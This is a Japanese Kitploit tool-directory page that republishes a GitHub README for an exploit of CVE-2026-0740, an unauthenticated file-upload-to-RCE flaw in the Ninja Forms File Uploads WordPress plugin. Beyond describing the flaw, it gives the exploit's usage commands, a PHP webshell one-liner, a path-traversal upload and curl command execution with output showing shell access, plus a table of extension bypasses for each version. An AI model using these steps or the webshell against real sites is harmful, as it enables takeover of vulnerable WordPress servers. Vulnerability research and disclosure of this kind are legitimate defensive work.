Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-0740 — Ninja Forms File Uploads <= 3.3.26 - 認証不要の任意ファイルアップロードによるRCE(CVE-2026-0740) | Kitploit
ツール/GitHubGitHub/whattheslime/cve-2026-0740
ペイロード生成脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubwhattheslime/cve-2026-0740

CVE-2026-0740

Ninja Forms File Uploads <= 3.3.26 - 認証不要の任意ファイルアップロードによるRCE(CVE-2026-0740)

リポジトリを見る
1222ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-0740

Ninja Forms File Uploads <= 3.3.26 - 未認証の任意ファイルアップロードによるRCE

CVE-2026-0740 のエクスプロイトです。発見者: Selim Lanouar (whattheslime)。

技術的な詳細については、Lexfoのブログの完全な記事 をお読みください。

免責事項

このリポジトリは研究および防御的セキュリティ目的のみで提供されます。

著者は、この情報の悪用について一切の責任を負いません。


概要

WordPress用のNinja Forms - File Uploadsプラグインは、3.3.26以前のすべてのバージョンにおいて、リモートコード実行 (RCE) につながる未認証の任意ファイルアップロードに対して脆弱です。

この脆弱性は当初、バージョン 3.3.23 で発見・報告されました。3.3.24 までは容易に悪用可能です(宛先ファイル名の検証がないため)。バージョン 3.3.25 および 3.3.26 では段階的な部分修正が導入されましたが、完全に修正されたのはバージョン 3.3.27 のみです。

脆弱性の連鎖は以下のとおりです:

  1. 未認証ユーザーが、任意の field_id を指定して nf_fu_get_new_nonce AJAX アクションを介して有効なアップロード nonce を取得します。
  2. nf_fu_upload ハンドラーは、アップロードされたファイルの拡張子(例: image.jpg)を検証しますが、クライアントが POST パラメータ(image_jpg)を介して宛先ファイル名を上書きすることを許可します。
  3. 宛先ファイル名は適切なサニタイズなしに move_uploaded_file() へ渡されるため、任意の拡張子とパストラバーサル(../)が可能になります。

完全な拡張子テーブルと技術的な詳細については、完全なブログ記事 を参照してください。


悪用手順

前提条件

  • Ninja Forms プラグインがインストールされ、有効化されていること。
  • Ninja Forms - File Uploads 拡張機能がインストールされ、有効化されていること (<= 3.3.26)。
  • アクティブなフォームや既存のファイルアップロードフィールドは不要です。

セットアップ

root@kitploit:~
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 CVE-2026-0740.py -h

ファイルをアップロード(パストラバーサルなし)

root@kitploit:~
python3 CVE-2026-0740.py -t http://localhost:8000 -f test.txt

ファイルは wp-content/uploads/ninja-forms/tmp/test.txt に書き込まれます。

パストラバーサルを伴うアップロード (<= 3.3.24)

root@kitploit:~
python3 CVE-2026-0740.py -t http://localhost:8000 -f webshell.php -d ../../../webshell.php

ファイルは wp-content/webshell.php に書き込まれます。

カスタム宛先ファイル名でのアップロード

root@kitploit:~
python3 CVE-2026-0740.py -t http://localhost:8000 -f evil-htaccess -d .htaccess

例

root@kitploit:~
# 1. Detect version
httpx -fr -u http://localhost:8000 -ms 'file_uploads_nfpluginsettings-js' -er 'nfpluginsettings\.js\?ver=[\d\.]+' 2>/dev/null
http://localhost:8000 [nfpluginsettings.js?ver=3.3.24]

# 2. Write webshell
echo '<?php system($_GET["cmd"]); ?>' > /tmp/slime.php

# 3. Upload
python3 CVE-2026-0740.py -t http://localhost:8000 -f /tmp/slime.php -d ../ws.php
[2026-04-07] [20:20:11] [info] [http://localhost:8000] Fetch nonce for random field_id: 3711569793384815...
[2026-04-07] [20:20:12] [success] [http://localhost:8000] Got ninja-forms-upload nonce: a320b7ed4a
[2026-04-07] [20:20:12] [info] [http://localhost:8000] Uploading slime.php as ../ws.php via POST parameter...
[2026-04-07] [20:20:12] [success] [http://localhost:8000] File uploaded at: http://localhost:8000/wp-content/uploads/ninja-forms/ws.php

# 4. Execute commands
curl http://localhost:8000/wp-content/uploads/ninja-forms/ws.php\?cmd\=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

参考文献

  • ブログ記事 - 技術的な詳細
  • CVE-2026-0740
  • Wordfence - 影響を受けたWordPressサイト50,000件
  • Wordfence - 脆弱性の詳細
ツールをダウンロード
ベクター / 拡張子<= 3.3.243.3.253.3.263.3.27
パストラバーサル (../)PASS---
.phpPASS---
.phtml, .pharPASSPASS--
.phtPASSPASSPASS-
.html, .svg, .jsPASSPASSPASS-